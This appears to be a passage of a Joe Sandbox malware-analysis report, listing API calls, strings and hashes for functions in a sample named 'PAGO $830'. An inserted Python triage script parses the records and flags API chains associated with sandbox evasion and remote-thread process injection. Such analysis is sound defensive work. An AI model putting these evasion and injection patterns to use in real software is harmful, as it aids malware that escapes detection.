                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D779F4
                                                          • GetStockObject.GDI32(00000011), ref: 00D77A08
                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00D77A12
                                                          Similarity
                                                          • API ID: CreateMessageObjectSendStockWindow
                                                          • String ID:
                                                          • API String ID: 3970641297-0
                                                          APIs
                                                          • ___BuildCatchObject.LIBVCRUNTIME ref: 00D93AE6
                                                            • Part of subcall function 00D93A33: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00D93A62
                                                            • Part of subcall function 00D93A33: ___AdjustPointer.LIBCMT ref: 00D93A7D
                                                          • _UnwindNestedFrames.LIBCMT ref: 00D93AFB
                                                          • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00D93B0C
                                                          • CallCatchBlock.LIBVCRUNTIME ref: 00D93B34
                                                          Similarity
                                                          • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                          • String ID:
                                                          • API String ID: 737400349-0
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00DB242E,00000000,00000000,?,00DA2FAA,00DB242E,00000000,00000000,00000000,?,00DA321B,00000006,FlsSetValue), ref: 00DA3035
                                                          • GetLastError.KERNEL32(?,00DA2FAA,00DB242E,00000000,00000000,00000000,?,00DA321B,00000006,FlsSetValue,00E122B0,FlsSetValue,00000000,00000364,?,00DA2DD6), ref: 00DA3041
                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00DA2FAA,00DB242E,00000000,00000000,00000000,?,00DA321B,00000006,FlsSetValue,00E122B0,FlsSetValue,00000000), ref: 00DA304F
                                                          Similarity
                                                          • API ID: LibraryLoad$ErrorLast
                                                          • String ID:
                                                          • API String ID: 3177248105-0
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00DD73D5
                                                          • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00DD73ED
                                                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00DD7402
                                                          • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00DD7420
                                                          Similarity
                                                          • API ID: Type$Register$FileLoadModuleNameUser
                                                          • String ID:
                                                          • API String ID: 1352324309-0
                                                          APIs
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00DDABF1,?,00008000), ref: 00DDAFE2
                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00DDABF1,?,00008000), ref: 00DDB007
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00DDABF1,?,00008000), ref: 00DDB011
                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00DDABF1,?,00008000), ref: 00DDB044
                                                          Similarity
                                                          • API ID: CounterPerformanceQuerySleep
                                                          • String ID:
                                                          • API String ID: 2875609808-0
                                                          APIs
                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00DD2D09
                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00DD2D1A
                                                          • GetCurrentThreadId.KERNEL32 ref: 00DD2D21
                                                          • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00DD2D28
                                                          Similarity
                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                          • String ID:
                                                          • API String ID: 2710830443-0
                                                          APIs
                                                            • Part of subcall function 00D8AABF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D8AB19
                                                            • Part of subcall function 00D8AABF: SelectObject.GDI32(?,00000000), ref: 00D8AB28
                                                            • Part of subcall function 00D8AABF: BeginPath.GDI32(?), ref: 00D8AB3F
                                                            • Part of subcall function 00D8AABF: SelectObject.GDI32(?,00000000), ref: 00D8AB68
                                                          • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00E08779
                                                          • LineTo.GDI32(?,?,?), ref: 00E08786
                                                          • EndPath.GDI32(?), ref: 00E08796
                                                          • StrokePath.GDI32(?), ref: 00E087A4
                                                          Similarity
                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                          • String ID:
                                                          • API String ID: 1539411459-0
                                                          APIs
                                                          • GetSysColor.USER32(00000008), ref: 00D8AD4C
                                                          • SetTextColor.GDI32(?,?), ref: 00D8AD56
                                                          • SetBkMode.GDI32(?,00000001), ref: 00D8AD69
                                                          • GetStockObject.GDI32(00000005), ref: 00D8AD71
                                                          Similarity
                                                          • API ID: Color$ModeObjectStockText
                                                          • String ID:
                                                          • API String ID: 4037423528-0
                                                          APIs
                                                          • GetCurrentThread.KERNEL32 ref: 00DD1578
                                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,00DD111D), ref: 00DD157F
                                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00DD111D), ref: 00DD158C
                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,00DD111D), ref: 00DD1593
                                                          Similarity
                                                          • API ID: CurrentOpenProcessThreadToken
                                                          • String ID:
                                                          • API String ID: 3974789173-0
                                                          APIs
                                                          • GetDesktopWindow.USER32 ref: 00DCE008
                                                          • GetDC.USER32(00000000), ref: 00DCE012
                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00DCE01E
                                                          • ReleaseDC.USER32(?), ref: 00DCE03F
                                                          Similarity
                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                          • String ID:
                                                          • API String ID: 2889604237-0
                                                          APIs
                                                            • Part of subcall function 00D78FA0: _wcslen.LIBCMT ref: 00D78FA5
                                                          • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00DE4DF2
                                                          Strings
                                                          Similarity
                                                          • API ID: Connection_wcslen
                                                          • String ID: *$LPT
                                                          • API String ID: 1725874428-3443410124
                                                          APIs
                                                          • __startOneArgErrorHandling.LIBCMT ref: 00D9E29D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ErrorHandling__start
                                                          • String ID: pow
                                                          • API String ID: 3213639722-2276729525
                                                          • Opcode ID: 4422fd5381d97d095d0ef34330e142fbb0d788838fd3321ed0d5aad2c93416c9
                                                          • Instruction ID: 3a336f9d1721a7300d6647907f7d403f64b5e9eee77f945c13295f6fc3d60c41
                                                          • Opcode Fuzzy Hash: 4422fd5381d97d095d0ef34330e142fbb0d788838fd3321ed0d5aad2c93416c9
                                                          • Instruction Fuzzy Hash: 58516071A0C102D6CF15BB14CD013792BA8EB41751F388D99F0D5522E9DB35CCD69ABA
                                                          APIs
                                                          • CharUpperBuffW.USER32(00DC6279,00000000,?,00E0D0D0,?,00000000,00000000), ref: 00DF7804
                                                            • Part of subcall function 00D784E7: _wcslen.LIBCMT ref: 00D784FA
                                                          • CharUpperBuffW.USER32(00DC6279,00000000,?,00E0D0D0,00000000,?,00000000,00000000), ref: 00DF7762
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper$_wcslen
                                                          • String ID: Ls
                                                          • API String ID: 3544283678-1452845052
                                                          • Opcode ID: e25884578ffb00579aa4b9e4556c011fb14062006b2d575a8c6ecd536888432b
                                                          • Instruction ID: b829f30ce606dbe61529a7aa6dc869d3d34e75de3393d055971dab51749d86c9
                                                          • Opcode Fuzzy Hash: e25884578ffb00579aa4b9e4556c011fb14062006b2d575a8c6ecd536888432b
                                                          • Instruction Fuzzy Hash: 7C612D32924219AACF14FBE4DC95DFD7778FF18300B449029E64666091FF609A49CBB0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #
                                                          • API String ID: 0-1885708031
                                                          • Opcode ID: f92a97b72590d97ca515ce31ec938a67d5d2ddf874112f29ae01cd43a2b7dacd
                                                          • Instruction ID: 4c4f88ee095211007b2225aefa155f18f3d9b003a856a2b5f994fb431d4a7e4b
                                                          • Opcode Fuzzy Hash: f92a97b72590d97ca515ce31ec938a67d5d2ddf874112f29ae01cd43a2b7dacd
                                                          • Instruction Fuzzy Hash: FF51E332905246DFCB159F29C491AFA77B0EF19310F68805AFD969B290E734DD46CB70
                                                          APIs
                                                          • Sleep.KERNEL32(00000000), ref: 00D8F381
                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 00D8F39A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: GlobalMemorySleepStatus
                                                          • String ID: @
                                                          • API String ID: 2783356886-2766056989
                                                          • Opcode ID: 0d080532b526e8232500c74889abd3e3322dbfbbca53d3c4d1d6d505b6166047
                                                          • Instruction ID: a8e3f8b26ceb241e4ea702a359ab83f1f6741c0d4380daf93e20aff75aa47d4c
                                                          • Opcode Fuzzy Hash: 0d080532b526e8232500c74889abd3e3322dbfbbca53d3c4d1d6d505b6166047
                                                          • Instruction Fuzzy Hash: 025148714187449BD320AF11D886BAFBBE8FF84344F81885DF1D9511A1EB308929CB77
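The records in this listing are the report's own data. What follows is an added example, not part of the Joe Sandbox report or its tooling: a parser that turns a few of these per-function records (two of them copied above as constructed, abridged sample input) into structured fields, indexes them by Opcode ID, and flags functions whose direct API calls contain a given chain. The record-boundary rule (a record ends at its Instruction Fuzzy Hash line) and the entry regexes are inferred from the listing's layout, and the chain table is an assumed analyst heuristic, not a Joe Sandbox signature.

```python
"""Parse Joe Sandbox per-function records ('APIs / Memory Dump Source /
Similarity' blocks) into structured data and flag API call chains.

Added example, not part of the Joe Sandbox report or its tooling. Layout
rules are inferred from the listing; the chain table is an assumption."""
import re
from dataclasses import dataclass, field
from typing import Optional

BULLET = "\u2022"  # the bullet that prefixes every entry in the listing

# Constructed sample input: two records copied from the listing, abridged
# (the repeated "Associated:" lines are dropped; the parser tolerates them).
SAMPLE = """\
APIs
\u2022 Sleep.KERNEL32(00000000), ref: 00D8F381
\u2022 GlobalMemoryStatusEx.KERNEL32(?), ref: 00D8F39A
Strings
Memory Dump Source
\u2022 Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
Similarity
\u2022 API ID: GlobalMemorySleepStatus
\u2022 String ID: @
\u2022 API String ID: 2783356886-2766056989
\u2022 Opcode ID: 0d080532b526e8232500c74889abd3e3322dbfbbca53d3c4d1d6d505b6166047
\u2022 Instruction Fuzzy Hash: 025148714187449BD320AF11D886BAFBBE8FF84344F81885DF1D9511A1EB308929CB77
APIs
\u2022 InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00DECC9B
\u2022 InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00DECCC4
Strings
Memory Dump Source
\u2022 Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
Similarity
\u2022 API ID: Internet$OpenOption
\u2022 String ID: <local>
\u2022 API String ID: 942729171-4266983199
\u2022 Opcode ID: 052d5e4dfe1010ef4fde33eac3cd5edc778853825d356317ec6b5d70b9b44093
\u2022 Instruction Fuzzy Hash: 08112571221672BAD7385B638C48EF7BE9CEF127A4F24621AB15E93180D3608846C6F0
"""

# One API entry: "Sleep.KERNEL32(00000000), ref: 00D8F381" or the paren-less
# "_wcslen.LIBCMT ref: 00DED04E"; subcall entries carry the callee address.
API_RE = re.compile(
    r"^" + BULLET + r"\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)
KV_RE = re.compile(r"^" + BULLET + r"\s*(?P<key>[^:]+):\s*(?P<value>.*)$")
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# Assumed heuristic table (not a Joe Sandbox rule): direct calls that are worth
# a second look when they occur together in one function.
API_CHAINS = {
    frozenset({"Sleep", "GlobalMemoryStatusEx"}): "delay followed by RAM-size query (sandbox/VM sizing check)",
    frozenset({"VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread"}): "remote-thread injection primitives",
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    subcall_of: Optional[str] = None  # set for "Part of subcall function" entries


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)  # "API ID", "Opcode ID", "Source File", ...

    def direct_api_names(self) -> set:
        return {c.name for c in self.apis if c.subcall_of is None}


def parse_records(text: str) -> list:
    """Split the listing into records; a record ends at its Instruction Fuzzy Hash line."""
    records, current, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        m = API_RE.match(line)
        if m and section in (None, "APIs"):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            current.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
            continue
        if section == "Strings" and line.startswith(BULLET):
            current.strings.append(line[len(BULLET):].strip())
            continue
        m = KV_RE.match(line)
        if m:
            key, value = m["key"].strip(), m["value"].strip()
            current.fields[key] = value
            if key == "Instruction Fuzzy Hash":  # last field of every record
                records.append(current)
                current, section = FunctionRecord(), None
    return records


def flag_api_chains(records: list) -> list:
    """Return (Opcode ID, description) for every record whose direct calls cover a chain."""
    hits = []
    for rec in records:
        names = rec.direct_api_names()
        for chain, why in API_CHAINS.items():
            if chain <= names:
                hits.append((rec.fields.get("Opcode ID", "?"), why))
    return hits


def index_by_opcode(records: list) -> dict:
    """Opcode ID -> record; the key the report itself uses for cross-sample similarity."""
    return {rec.fields["Opcode ID"]: rec for rec in records if "Opcode ID" in rec.fields}


if __name__ == "__main__":
    for opcode_id, why in flag_api_chains(parse_records(SAMPLE)):
        print(opcode_id[:16], why)
```

Run over a whole exported listing, the Opcode ID index lets you check whether a function seen in one sample recurs in another build, and the chain table is the place to encode whichever API combinations your own triage treats as notable.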
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper_wcslen
                                                          • String ID: CALLARGARRAY
                                                          • API String ID: 157775604-1150593374
                                                          • Opcode ID: c7286bfc8fb81f8cfba98f928abbb7f9bbc85735ffb89fb198415af124205424
                                                          • Instruction ID: a3c87f34dfb63fdac17afc939f45e00f297bb22f3b13eedaa73ed086ffe9b5ce
                                                          • Opcode Fuzzy Hash: c7286bfc8fb81f8cfba98f928abbb7f9bbc85735ffb89fb198415af124205424
                                                          • Instruction Fuzzy Hash: 7641A271A00209DFCB04EFA4D8859BEBBF5FF59324F158029E605AB251EB719D81CBB0
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 00DED04E
                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00DED058
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CrackInternet_wcslen
                                                          • String ID: |
                                                          • API String ID: 596671847-2343686810
                                                          • Opcode ID: 7753018c16d18c99a9528e4c528920a3fc4bb96b5fbb38fa5c9b36945fd10023
                                                          • Instruction ID: ada163796b921ca3d62e02f1138a508f6cc277b98a7b9d758e9bfdccb9badbd8
                                                          • Opcode Fuzzy Hash: 7753018c16d18c99a9528e4c528920a3fc4bb96b5fbb38fa5c9b36945fd10023
                                                          • Instruction Fuzzy Hash: B4311A71D01209ABCF11AFA5DC85AEE7FB9FF04340F144029F819A6166EB319956DB70
                                                          APIs
                                                          • DestroyWindow.USER32(?,?,?,?), ref: 00E03554
                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00E0358F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Window$DestroyMove
                                                          • String ID: static
                                                          • API String ID: 2139405536-2160076837
                                                          • Opcode ID: 46ee1b50c5b678157fe41992af7b0f2d26c637dc7136ab27ce5e6f6eadb0d8ca
                                                          • Instruction ID: ee8a87573d065e623750c778da92169cabedd58470f74634119b50f221be910f
                                                          • Opcode Fuzzy Hash: 46ee1b50c5b678157fe41992af7b0f2d26c637dc7136ab27ce5e6f6eadb0d8ca
                                                          • Instruction Fuzzy Hash: A0319E71100604AEDB159F78DC80AFB73ADFF48724F10A619F9A9A7190DA31EDC5CB60
                                                          APIs
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00E04554
                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E04569
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: '
                                                          • API String ID: 3850602802-1997036262
                                                          • Opcode ID: dda7404c86954b5a985296eb104842f8b1bdc896588620e232f2e149be0408c3
                                                          • Instruction ID: d67bedfc8068f53f3582446ae994de5477ff69d206ddc70018690a4464786777
                                                          • Opcode Fuzzy Hash: dda7404c86954b5a985296eb104842f8b1bdc896588620e232f2e149be0408c3
                                                          • Instruction Fuzzy Hash: CF3139B5A003099FDB14DFA9DA80BDA7BB5FF09304F10516AEA04AB391D770A981CF90
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00E031AF
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E031BA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: Combobox
                                                          • API String ID: 3850602802-2096851135
                                                          • Opcode ID: c3c0dfd9f9680bf6e40ddf851337362aad914f0c500cd2116824e572857f8516
                                                          • Instruction ID: b8ce129724365905d73f053af4cd4231adc6c03d6015322f742330bd5eed6d68
                                                          • Opcode Fuzzy Hash: c3c0dfd9f9680bf6e40ddf851337362aad914f0c500cd2116824e572857f8516
                                                          • Instruction Fuzzy Hash: 881190713012086FEF259F64DC80EAB37AEEB59368F105228F958AB2D0D6719D9187A0
                                                          APIs
                                                            • Part of subcall function 00D779B6: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D779F4
                                                            • Part of subcall function 00D779B6: GetStockObject.GDI32(00000011), ref: 00D77A08
                                                            • Part of subcall function 00D779B6: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D77A12
                                                          • GetWindowRect.USER32(00000000,?), ref: 00E036AD
                                                          • GetSysColor.USER32(00000012), ref: 00E036C7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                          • String ID: static
                                                          • API String ID: 1983116058-2160076837
                                                          • Opcode ID: 199d72181cd8381e768a49494e9238c07de28c206db5064e666cf99dc8881161
                                                          • Instruction ID: 9453c2a3caba36c87415a2951c9640c661966751bfe7fb6ba727c6f278b93955
                                                          • Opcode Fuzzy Hash: 199d72181cd8381e768a49494e9238c07de28c206db5064e666cf99dc8881161
                                                          • Instruction Fuzzy Hash: 9E115972610209AFDB00DFB8DC45AEA7BA8EB08304F105525FD56E3290E736E894DB60
                                                          APIs
                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00DECC9B
                                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00DECCC4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Internet$OpenOption
                                                          • String ID: <local>
                                                          • API String ID: 942729171-4266983199
                                                          • Opcode ID: 052d5e4dfe1010ef4fde33eac3cd5edc778853825d356317ec6b5d70b9b44093
                                                          • Instruction ID: 9df4f009c166f4add99b5138620d23f43128dedbc93d31ebd7e5ed6a1ee7d73f
                                                          • Opcode Fuzzy Hash: 052d5e4dfe1010ef4fde33eac3cd5edc778853825d356317ec6b5d70b9b44093
                                                          • Instruction Fuzzy Hash: 08112571221672BAD7385B638C48EF7BE9CEF127A4F24621AB15E93180D3608846C6F0
                                                          APIs
                                                          • GetWindowTextLengthW.USER32(00000000), ref: 00E033DE
                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00E033ED
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: LengthMessageSendTextWindow
                                                          • String ID: edit
                                                          • API String ID: 2978978980-2167791130
                                                          • Opcode ID: c8a54f68c42fcab45e7cd517b1647a991c166fafab58316889a6b7740fdd06f8
                                                          • Instruction ID: db97b295809e0e1296616bcda63028841cfaff0993a1b424b7c51500ee933295
